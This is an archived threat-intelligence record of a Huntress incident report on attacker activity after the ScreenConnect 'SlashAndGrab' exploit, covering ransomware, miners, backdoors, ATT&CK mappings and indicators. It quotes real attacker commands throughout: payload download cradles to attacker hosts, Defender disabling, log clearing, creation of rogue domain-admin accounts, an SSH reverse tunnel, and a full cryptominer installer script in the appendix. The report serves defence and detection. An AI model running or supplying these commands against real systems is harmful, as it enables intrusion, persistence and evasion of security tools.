{
	"id": "acdc8103-ea12-4c82-a135-81d9cd123f5a",
	"created_at": "2026-04-06T00:10:37.287597Z",
	"updated_at": "2026-04-10T03:24:24.767151Z",
	"deleted_at": null,
	"sha1_hash": "5e909be8ce8fd4a266ff8ce956ee2db237761b95",
	"title": "SlashAndGrab | Huntress",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9442908,
	"plain_text": "SlashAndGrab | Huntress\r\nArchived: 2026-04-05 20:26:45 UTC\r\nTable of Contents: \r\nAdversaries Deploying Ransomware\r\nAdversaries Enumerating\r\nAdversary Cryptocurrency Miners\r\nAdversaries Installing Additional Remote Access\r\nDownloading Tools and Payloads\r\nAdversaries Dropping Cobalt Strike\r\nAdversaries Persisting\r\nWrapping Up\r\nAppendix\r\nSince February 19, Huntress has been sharing technical details of the ScreenConnect vulnerability we’re calling\r\n“SlashAndGrab.” In previous posts, we shared the details of this vulnerability, its exploit, and shared detection guidance.\r\nIn this article, we’ve collected and curated threat actor activity fresh from the Huntress Security Operations Center (SOC),\r\nwhere our team has detected and kicked out active adversaries leveraging ScreenConnect access for post-exploitation\r\ntradecraft.\r\nThe adversaries taking advantage of this vulnerability have been VERY busy. There is a lot to cover here, so buckle up and\r\nenjoy some tradecraft! \r\nAdversaries Deploying Ransomware \r\nA number of adversaries leveraged their newly ill-gotten ScreenConnect gains to deploy ransomware. \r\nLockBit\r\nWith the impressive joint international takedown efforts to disrupt the LockBit ransomware group, many are asking how\r\n“LockBit” is still relevant. The LockBit deployments that we’ve seen are invoked with an encryptor that looks to be\r\ncompiled around September 13, 2022—which is the same timeline as the leaked LockBit 3.0 builder in the past. One\r\nobserved filename is classic LB3.exe, which again, matches the canned and publicly leaked builder.\r\nWe believe this is an important distinction. 
While the malware deployed appears associated with LockBit, there is no\r\nevidence we’ve seen suggesting the joint international takedown efforts are anything short of a landmark milestone to\r\ndisrupt one of the largest and most active ransomware groups in the world.\r\n#Ransomware binaries\r\nC:\\\\Windows\\\\TEMP\\\\ScreenConnect\\\\22.5.7881.8171\\\\LB3.exe\r\n#Defense evasion\r\npowershell -c foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid}\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 1 of 19\n\nFigure 1: Example of LockBit ransomware executed through ScreenConnect\r\nWe’ve included the resulting ransom note associated with the above executable. \r\nFigure 2: Ransomware note \r\nOther Ransomware Attempts\r\nWe observed other ransomware attempts, like upd.exe and svchost.exe, that Microsoft Defender consistently neutralized.\r\nWe also observed adversaries use certutil to download ransomware .MSI payloads, which they also made persistent via\r\nstartup folders.\r\ncertutil -urlcache -f http[:]//23.26.137[.]225:8084/msappdata.msi c:\\mpyutd.msi\r\nFigure 3: Example of ransomware added as a persistence mechanism\r\nThe ransom note from the threat actor who deployed the MSI has been included as well. \r\nFigure 4: Example ransomware note\r\nRansomware Anti-Forensics\r\nRansomware actors also tried to remove event logs via wevtutil.exe cl to frustrate investigators' analysis at a later time.\r\nFortunately, Huntress Managed EDR is far too perceptive to entertain adversarial frustration. 
😉 \r\nFigure 5: Example execution of wevtutil.exe log clearing via ScreenConnect\r\nAdversaries Enumerating\r\nThere was a particular adversary, using 185.62.58[.]132, executing a script on compromised systems across multiple unique\r\nvictim networks. The intent of the script was to identify which of their compromised systems had the highest privileges.\r\nWe believe this demonstrates the scale with which threat actors are abusing this vulnerability as they are working to\r\nautomate their understanding of where to take additional, post-compromise actions moving forward. \r\npowershell.exe Invoke-WebRequest -Uri http[:]//108.61.210.72/MyUserName_$env:UserName\r\nFigure 6: Adversary enumerating the user they control via ScreenConnect \r\nFigure 7: Adversary enumerating the user they control via ScreenConnect \r\nAdversary Cryptocurrency Miners\r\nSomewhat disappointingly, for lack of originality, a significant number of adversaries used their ScreenConnect access to\r\ndeploy cryptocurrency coin miners.\r\nThere was a particularly entertaining attempt to masquerade a coinminer as a legitimate SentinelOne file. 
\r\npowershell wget -uri http://185[.]232[.]92[.]32:8888/SentinelUI.exe -OutFile C:\\\\Windows\\\\Help\\\\Help\\\\SentinelUI.exe;\r\nwget -uri http://185[.]232[.]92[.]32:8888/Logs.txt -OutFile C:\\\\Windows\\\\Help\\\\Help\\\\Logs.txt;\r\nwget -uri http://185[.]232[.]92[.]32:8888/SentinelAgentCore.dll -OutFile C:\\\\Windows\\\\Help\\\\Help\\\\SentinelAgentCore.dll;\r\ncmd /c C:\\\\Windows\\\\Help\\\\Help\\\\SentinelUI.exe;\r\nSCHTASKS /Create /TN \\\\Microsoft\\\\Windows\\\\Wininet\\\\UserCache_1708535250863 /TR \\\"C:\\\\Windows\\\\Help\\\\Help\\\\SentinelUI.exe\\\" /RU SYSTEM /SC ONSTART /RL HIGHEST /NP /F /DELAY 0000:05\r\nFigure 8: Creation of a coinminer masquerading as SentinelOne\r\nWe also observed adversaries downloading and using an xmrig cryptominer, with further details below. \r\nAdversaries Installing Additional Remote Access\r\nAdversaries seemed to commonly install additional, “legitimate” remote access tools, likely as an attempt to remain\r\npersistent even once the ScreenConnect fiasco has been cleared up. 
\r\nSimple Help\r\nAn adversary we observed installed the Simple Help RMM from their ScreenConnect initial access.\r\nWe observed the Simple Help RMM agent deployed in the following directories:\r\nC:\\\\Users\\\\oldadmin\\\\Documents\\\\Maxx Uptime remote connection\\\\Files\\\\agent.exe\r\nC:\\\\ProgramData\\\\JWrapper-Remote Access\\\\JWAppsSharedConfig\\\\restricted\\\\SimpleService.exe\r\nC:\\\\Users\\\\oldadmin\\\\Documents\\\\MilsoftConnect\\\\Files\\\\ta.exe\r\nC:\\Windows\\spsrv.exe\r\nWe also observed a configuration file dropped to C:\\\\ProgramData\\\\JWrapper-Remote Access\\\\JWAppsSharedConfig\\\\serviceconfig.xml, which revealed it was configured to communicate to the public IPv4\r\n91.92.240[.]71.\r\nThe user oldadmin was observed running similar commands across multiple unique victim organizations.\r\nFigure 9: Execution of Simple Help RMM Agent\r\nSSH\r\nThis threat actor leveraged their ScreenConnect access to download and run an SSH backdoor, seemingly to facilitate an\r\nRDP connection. 
\r\n#Script that initiated SSH\r\n$r = \"C:\\ssh\\\"\r\n$e = $r + \"ssh.exe\"\r\n$g = \"aqua.oops.wtf\"\r\nIf (!(Test-Path $e)) {\r\nmd $r \u003e $null\r\niwr -Uri ($g + \"/z\") -o ($r + \"z.zip\")\r\nExpand-Archive ($r + \"z.zip\") -d $r\r\n}\r\n$args = @(\"tunnel@\" + $g,\"-Z lollersk8\",\"-R \" + $p + \":localhost:3389\",\"-p 443\", \"-N\",\"-oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null\")\r\n(Start-Process -f $e -a $args -PassThru -WindowStyle Hidden).Id\r\n#final command run on a host\r\nC:\\ssh\\ssh.exe tunnel@aqua[.]oops.wtf -Z lollersk8 -R 9595:localhost:3389 -p 443 -N -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null\r\nFigure 10: Huntress report for the aforementioned ssh backdoor\r\nGoogle Chrome Remote Desktop\r\nWe also observed an adversary do something quite interesting with Google Chrome’s Remote Desktop. They pulled the\r\ninstaller directly from Google infrastructure, which installs it as a service—no doubt in the hopes they could persistently and\r\nremotely access the environment via a second GUI remote access tool (we enjoy crushing hacker hopes here at Huntress).  
\r\n# Download from Google\r\npowershell -c (New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $env:ProgramData+'\\\\1.msi')\r\n# Install\r\nmsiexec /i C:\\\\ProgramData\\\\1.msi\r\nFigure 11: Attempted download of Google Chrome’s Remote Desktop client\r\nFigure 12: Huntress platform detecting the persistent installation of Google Chrome’s Remote Desktop client\r\nDownloading Tools and Payloads\r\nA common tradecraft denominator between the adversaries we observed involved them downloading further tools and\r\npayloads.\r\nFor example, an adversary leveraged PowerShell’s Invoke-WebRequest (iwr) to call on additional payloads for their SSH\r\npersistent tunnel.\r\npowershell.exe -c \"$p = 9595; iwr -UseBasicParsing aqua[.]oops[.]wtf/d | iex\"\r\nFigure 13: Attempted PowerShell cradle download invocation to grab additional post-exploitation tools for\r\nSSH tunneling\r\nWe also observed an adversary download the SimpleHelp RMM via curl and rename the executables to .png’s in an attempt\r\nto evade detection (spoiler: they did not evade detection). \r\ncurl https[:]//cmctt[.]com/pub/media/wysiwyg/sun.png\r\ncurl https[:]//cmctt[.]com/pub/media/wysiwyg/invoke.png\r\nFigure 14: SimpleHelp RMM renamed to sun.png, accessed via curl download\r\nThere was also this straightforward PowerShell downloading activity. However, the file was deleted, and their infrastructure\r\nwas offline, meaning the file’s intent could not be determined. 
\r\npowershell.exe -command \"\u0026 Invoke-RestMethod -Uri \\\"http[:]//91.92.241.199:8080/servicetest2.dll\\\" -OutFile servicehost.dll\"\r\nDownload Evasion\r\nWe also observed adversaries leverage LOLBINs like certutil to download their payloads, likely in an attempt to fly under\r\nthe radar.\r\ncertutil -urlcache -f http[:]//23.26.137[.]225:8084/msappdata.msi c:\\mpyutd.msi\r\nSome adversaries maliciously modified the AV on the host before downloading their payloads. In this specific example,\r\nsvchost.exe was deleted before analysis could be conducted. \r\n#adversary excluded directories and neutralised Defender\r\npowershell -ep bypass -c \\\"Set-MpPreference -DisableRealtimeMonitoring $true;\r\nSet-MpPreference -ExclusionPath C:\\\\Windows\\\\Temp;\r\n#then downloaded their file\r\nInvoke-WebRequest http://159[.]65[.]130[.]146:4444/svchost.exe -OutFile C:\\\\Windows\\\\Temp\\\\svchost.exe;\r\nC:\\\\Windows\\\\Temp\\\\svchost.exe\\\"\r\nFigure 15: Evidence of a malicious payload download with defense evasion attempt\r\nAdversaries also used their ScreenConnect sessions to reach out and download Cobalt Strike beacons from their external\r\ninfrastructure. 
Specifically, this threat actor saved their beacon as a .PDF on a web server, renaming it to a .DAT on the\r\ntargeted machine.\r\ncurl hxxp[://]minish[.]wiki[.]gd/c[.]pdf -o c:\\\\programdata\\\\update[.]dat\r\nFigure 16: Evidence of Cobalt Strike payload download\r\nTransfer.sh\r\nInterestingly, we observed an adversary mass download cryptocurrency miners using the temporary file upload website\r\ntransfer.sh.\r\npowershell -command \\\"iex ((New-Object System[.]Net[.]WebClient).DownloadString('hxxps[://]transfer[.]sh/gUHRYTNxj8/injcet2[.]ps1'))\\\"\r\nExcerpt of the script (full script in the Appendix): \r\n$listi = 'hxxps[://]transfer[.]sh/UFQTwgYszH/config14[.]json',\r\n'hxxps[://]transfer[.]sh/ATVMNG5Pbu/config13[.]json',\r\n'hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json',\r\n'hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json',\r\n'hxxps[://]transfer[.]sh/lyEkHLGt03/config10[.]json',\r\n'hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json',\r\n'hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json',\r\n'hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json',\r\n'hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json',\r\n'hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json',\r\n'hxxps[://]transfer[.]sh/6bkwRh4NXd/config4[.]json',\r\n'hxxps[://]transfer[.]sh/PRBRzMMEKC/config3[.]json',\r\n'hxxps[://]transfer[.]sh/RWSn6NLIr7/config2[.]json',\r\n'hxxps[://]transfer[.]sh/MRFibhy8fS/config1[.]json',\r\n'hxxps[://]transfer[.]sh/FeDRSFU5XV/config[.]json'\r\n$randconf = Get-Random -InputObject $listi\r\nInvoke-WebRequest -Uri $randconf -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'config[.]json'\r\nInvoke-WebRequest -Uri 'hxxps[://]transfer[.]sh/ePlTBkDtz2/rundll32[.]exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'xmrig[.]exe'\r\nInvoke-WebRequest -Uri 
'hxxps[://]transfer[.]sh/CrNx3LVEgY/nssm[.]exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'nssm[.]exe'\r\nFigure 17: PowerShell invocation of malicious script downloaded from Transfer.sh\r\nAdversaries Dropping Cobalt Strike\r\nUnsurprisingly, many adversaries attempted to drop and run a Cobalt Strike beacon on the host. \r\n# Downloaded from hxxp[://]minish[.]wiki[.]gd/c[.]pdf\r\n#Exclude directory in Defender\r\npowershell.exe Add-MpPreference -ExclusionPath C:\\\\programdata -Force\r\n#Deploy beacon\r\nrundll32.exe c:\\\\programdata\\\\update.dat UpdateSystem\r\nFigure 18: Setting exclude directory in Windows Defender for the Cobalt Strike beacon\r\nFigure 19: Execution of Cobalt Strike\r\nIt’s also worth noting that Defender thwarted many of these attempts, as seen in Figure 20.\r\nFigure 20: Evidence of Windows Defender neutralizing the Cobalt Strike beacon originating from the\r\nScreenConnect session\r\nIt was also common to see the same adversaries drop the cryptocurrency miner mentioned earlier (SentinelUI) and attempt a\r\nCobalt Strike beacon, which Windows Defender would neutralize. \r\nFigure 21: Evidence of cryptominers and Cobalt Strike being neutralized by Defender\r\nAdversaries Persisting\r\nAdversaries, of course, want to persist in an environment, beyond their initial access method—and for good reason. This\r\nScreenConnect vulnerability had rapid mitigations suggested by Huntress and ConnectWise that would have undermined the\r\nadversary’s access. 
\r\nCreating New Users\r\nOur SOC observed a number of adversaries prioritize creating their own users once they landed on a machine, using naming\r\nconventions that would attempt to fly under the radar, and adding these to highly privileged groups.\r\nnet user /add default test@2021! /domain\r\nnet group \\\"Domain Admins\\\" default /add /domain\r\nnet group \\\"Enterprise Admins\\\" default /add /domain\r\nnet group \\\"Remote Desktop Users\\\" default /add /domain\r\nnet group \\\"Group Policy Creator Owners\\\" default /add /domain\r\nnet group \\\"Schema Admins\\\" default /add /domain\r\nnet user default /active:yes /domain\r\nnet user /add default1 test@2021! /domain\r\nnet user /add default1 test@2021! /domain\r\nnet user /add oldadmin Pass8080!!\r\nnet localgroup administrators oldadmin /add\r\nnet user temp 123123qwE /add /domain\r\nnet group \\\"Domain Admins\\\" temp /add /domain\r\nFigure 22: Evidence of adding a new user\r\nPersistent Reverse Shell\r\nThe SOC also observed an adversary transfer C:\\\\perflogs\\\\RunSchedulerTaskOnce.ps1 through the compromised ScreenConnect\r\nclient, as confirmed from analysis of the Windows Event Log Application.evtx - Event ID 0.\r\n# Excerpt from Application.evtx EventID 0\r\nEventData:\r\nData:\r\n- \"Transferred files with action 'Transfer':\\r\\nRunSchedulerTask.ps1\\r\\nRunSchedulerTaskOnce.ps1\\r\\n\\r\\nVersion: 22.10.11109.8417\\r\\nExecutable Path: C:\\\\Program Files (x86)\\\\ScreenConnect Client (9dd8b1107d6a42d9)\\\\ScreenConnect.ClientService.exe\\r\\n\"\r\nChannel: Application\r\nEventID: 0\r\nEventID_attributes:\r\nSystemTime: \"2024-02-23T04:06:06Z\"\r\nFigure 23: PowerShell execution of a malicious script that included an encoded Driver.dll\r\nThe script was in fact deleted, but could be partially restored by taking the PowerShell Operational 
EVTX and running this\r\nscript, which re-stitched the script back together from its ScriptBlockId (excerpt of script below).\r\nFigure 24: Extract of PowerShell code from PowerShell Operational EVTX\r\nFigure 25: Extract of deobfuscated PowerShell code from CyberChef\r\nThis would download a driver.dll, and leverage WMI Event Consumer / PwSH persistence (named System__Cmr).\r\nFigure 26: Evidence of the encoded script’s persistence mechanism in the Huntress platform\r\nWrapping Up\r\nThis incredibly interesting ScreenConnect exploit has enamored many of us at Huntress for the last few days, but it’s a\r\nshame our adversaries didn’t commit to pairing this new exploit with new tradecraft.\r\nIt’s worth driving this point home: most of the post-compromise activities we have documented in this article aren’t\r\nnovel, original, or outstanding. Most threat actors simply don’t know what to do beyond the same usual, procedural\r\ntradecraft; cybercriminals are rarely sophisticated, and the infosec community can beat them together.\r\nAdversaries will default to their “tried and true” methods. An experienced, talented security team can neutralize most threat\r\nactors in the middle of their campaigns with ease. We hope this article inspires your security mindset. 
If you need any help\r\nmonitoring for activity related to this vulnerability, you can use Huntress' free trial.\r\nIf you’re interested in more, come and check out the next episode of our Product Lab webinar, where we’ll be sharing even\r\nmore technical details behind this threat and answer any questions from the community.\r\nAppendix\r\nATT\u0026CK\r\nTactic | Technique | Description\r\nInitial Access | T1190: Exploit Public-Facing Application | Adversaries are leveraging a path traversal bug and auth bypass in ScreenConnect that allows them to create a privileged account for remote control.\r\nDiscovery | T1087: Account Discovery | Adversaries are attempting to discover privileged users by running a script across compromised systems.\r\nDefense Evasion | T1562.001: Disable or Modify Tools | Adversaries are attempting to evade detection by adding exclusion paths to Windows Defender using PowerShell.\r\nDefense Evasion | T1070.001: Clear Windows Event Logs | Ransomware actors attempt to remove event logs using the wevtutil.exe cl command to hinder forensic analysis.\r\nExecution | T1059: Command and Scripting Interpreter; T1059.001: PowerShell; T1059.003: Windows Command Shell | Adversaries are using PowerShell and CMD to download and execute scripts from remote locations, facilitating various activities such as cryptocurrency mining and remote access.\r\nPersistence | T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Adversaries stored their MSI ransomware payload in the Public startup folder.\r\nPersistence | T1136: Create Account | Adversaries created new users and in some instances added them to privileged groups.\r\nPersistence | T1053: Scheduled Task | Adversaries are creating scheduled tasks for 
their cryptominers and remote access.\r\nPersistence | T1546.003: Event Triggered Execution: Windows Management Instrumentation Event Subscription | Adversaries are modifying the registry to achieve persistence by adding WMI Event Consumers.\r\nPersistence | T1133: External Remote Services | Adversaries are compromising ScreenConnect instances, deploying SSH tunnels, Chrome remote desktops, and alternate RMMs for evasive, persistent remote access.\r\nCommand and Control | T1105: Ingress Tool Transfer | Adversaries are downloading files using curl, certutil, and Invoke-WebRequest.\r\nCommand and Control | T1572: Protocol Tunneling | Adversaries created SSH tunnels for communication.\r\nImpact | T1496: Resource Hijacking | Cryptocurrency miners are being deployed by adversaries.\r\nImpact | T1486: Data Encrypted for Impact | Adversaries deployed ransomware via compromised ScreenConnect.\r\nSoftware | S0154: Cobalt Strike | Adversaries are leveraging Cobalt Strike beacons to achieve C2 connections to compromised ScreenConnect machines.\r\nIoCs\r\nIoC Type | Indicator | Hash\r\nRansomware | C:\\Windows\\TEMP\\ScreenConnect\\22.5.7881.8171\\LB3.exe | 78a11835b48bbe6a0127b777c0c3cc102e726205f67afefc\r\nRansomware | http[:]//23.26.137[.]225:8084/msappdata.msi c:\\mpyutd.msi | 8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc8\r\nRansomware | UPX.exe | 2da975fee507060baa1042fb45e8467579abf3f348f1fd37b\r\nRansomware | svchost.exe | a50d9954c0a50e5804065a8165b1857104816020024976\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/GElU1LmvbS/injcet.ps1 | ec49f5033374eb8f533e291111e1433e2da127f45857aebb\r\nCobalt Strike | hxxp[://]minish[.]wiki[.]gd/c[.]pdf C:\\programdata\\update[.]dat | 0a492d89ea2c05b1724a58dd05b7c4751e1ffdd2eab3a2f6\r\nCobalt Strike | C:\\perflogs\\RunSchedulerTaskOnce.ps1 | 6065fee2d0cb0dc7d0c0788e7e9424088e722dfcf9356d20\r\nCobalt Strike | copy.exe | 
81b4a649a42a157facede979828095ccddcdf6cec47e8a31\r\nGoogle Chrome Remote Desktop | https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi C:\\ProgramData\\1.msi | c47bfe3b3eccc86f87d2b6a38f0f39968f6147c2854f51f23\r\nSimpleHelp RMM | https[:]//cmctt[.]com/pub/media/wysiwyg/sun.png C:\\Windows\\spsrv.exe | e8c48250cf7293c95d9af1fb830bb8a5aaf9cfb192d8697d2\r\nSimpleHelp RMM | cmctt[.]com/pub/media/wysiwyg/invoke.png | 37a39fc1feb4b14354c4d4b279ba77ba51e0d413f88e6ab9\r\nSimpleHelp RMM | C:\\Users\\oldadmin\\Documents\\Maxx Uptime remote connection\\Files\\agent.exe | a0fd0ceb95e775a48a95c00eab42fa5bb170f552005c3881\r\nSimpleHelp RMM | C:\\ProgramData\\JWrapper-Remote Access\\JWAppsSharedConfig\\serviceconfig.xml | 2e0df44dd75dbdbd70f1a777178ad8a1867cf0738525508b\r\nSimpleHelp RMM IPv4 | 91.92.240[.]71\r\nSSH Script | d | 69c7fc246c4867f070e1a7b80c7c41574ee76ab54a8b543a\r\nSSH Script | Z.zip | aa9f5ed1eede9aac6d07b0ba13b73185838b159006fa83ed\r\nBeacon | driver.dll | 6e8f83c88a66116e1a7eb10549542890d1910aee0000e3e7\r\nUnknown | 
159[.]65[.]130[.]146:4444/svchost.exe C:\\Windows\\Temp\\svchost.exe\r\nCryptocurrency Miner | http://185[.]232[.]92[.]32:8888/SentinelUI.exe\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/6bkwRh4NXd/config4[.]json\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/PRBRzMMEKC/config3[.]json\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/RWSn6NLIr7/config2[.]json\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/MRFibhy8fS/config1[.]json\r\nCryptocurrency Miner | hxxps[://]transfer[.]sh/FeDRSFU5XV/config[.]json\r\nContents of inject.ps1 - Crypto Currency Miner\r\npowershell -command \\\"iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))\\\"\r\n# Check for Administrator rights\r\nif (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInR\r\nWrite-Host 'Please Run as Administrator!' 
-ForegroundColor Red\r\nExit\r\n}\r\n# Check and return current user name\r\n$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\\')[1]\r\n# Paths\r\n$dircheck = 'C:\\ProgramData\\.logstxt'\r\n#$filcheck = 'C:\\path\\to\\xmrig.service' # You might need to adjust this, Windows doesn't have an equivalent to systemd\r\n$filcheck = 'C:\\Users\\$currentUserName\\rundll32.exe'\r\n# Removal functions\r\nif (Test-Path $dircheck) {\r\nRemove-Item -Recurse -Force $dircheck\r\n}\r\nif (Test-Path $filcheck) {\r\nRemove-Item -Force $filcheck\r\n}\r\n# Download files, I am using ngrok as port forwarding for my containers to FTP server\r\n$listi =\r\n'https://transfer.sh/UFQTwgYszH/config14.json','https://transfer.sh/ATVMNG5Pbu/config13.json','https://transfer.sh/s27p8BcTxi/config12.json','http\r\n$randconf = Get-Random -InputObject $listi\r\nInvoke-WebRequest -Uri $randconf -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'config.json'\r\nInvoke-WebRequest -Uri 'https://transfer.sh/ePlTBkDtz2/rundll32.exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'xmrig.exe'\r\nInvoke-WebRequest -Uri 'https://transfer.sh/CrNx3LVEgY/nssm.exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'nssm.exe'\r\n# Create xmrig service file (assuming this has an equivalent in Windows)\r\n# TODO: Check if you need an actual service wrapper like NSSM\r\n# Get thread count (using CPU count as a basic substitute for now)\r\n$threads = (Get-WmiObject -Class Win32_ComputerSystem).NumberOfLogicalProcessors\r\n$tf = [math]::Round(25 * $threads)\r\n# Move and setup files\r\nif (-not (Test-Path $dircheck)) {\r\nNew-Item -ItemType Directory -Path $dircheck\r\n}\r\nMove-Item rundll32.exe $dircheck\r\nMove-Item config.json $dircheck\r\nMove-Item nssm.exe $dircheck\r\n# Move-Item xmrig.service 
C:\\path\\to\\services\\folder # Adjust path and use only if required\r\n# TODO: Setup as a Windows service (consider tools like NSSM or `sc` command)\r\n#create a nssm command that will make the xmrig.exe run as a service in the background\r\nSet-Location $dircheck\r\n.\\nssm install xmrig 'C:\\ProgramData\\.logstxt\\rundll32.exe'\r\n.\\nssm set xmrig AppDirectory 'C:\\ProgramData\\.logstxt'\r\n.\\nssm set xmrig AppParameters 'rundll32.exe -B -c config.json' # -B = run the miner in the background\r\n# Start the service\r\n.\\nssm start xmrig\r\n#make the xmrig service run on startup\r\n.\\nssm set xmrig start SERVICE_AUTO_START\r\n#make the xmrig write in a log file\r\n.\\nssm set xmrig AppNoConsole 1\r\n#make the xmrig run in the background\r\n.\\nssm set xmrig Type SERVICE_WIN32_OWN_PROCESS\r\n# TODO: Windows doesn't have an equivalent to sysctl or hugepages in the same sense as Linux\r\n# Clean up\r\nRemove-Item $PSCommandPath -Force\r\nAcknowledgments\r\nThank you to the following Huntress SOC analysts for their triage and reporting of the various adversarial activities\r\nincluded in this report: Adrian Garcia, Amelia Casley, Chad Hudson, Dani Dayal, Christopher ‘Dipo’ Rodipe, Dray Agha,\r\nFaith Stratton, Herbie Zimmerman, Izzy Spering, Jai Minton, John ‘JB’ Brennan, Jordan Sexton, Josh Allman, Mehtap\r\nOzdemir, Michael Elford, Stephanie Fairless, Susie Faulkner, Tim Kasper.\r\nSpecial thanks to Josh Allman and Dray Agha for further analysis, and collecting and curating this blog.\r\nSource: https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
	],
	"report_names": [
		"slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434237,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5e909be8ce8fd4a266ff8ce956ee2db237761b95.pdf",
		"text": "https://archive.orkl.eu/5e909be8ce8fd4a266ff8ce956ee2db237761b95.txt",
		"img": "https://archive.orkl.eu/5e909be8ce8fd4a266ff8ce956ee2db237761b95.jpg"
	}
}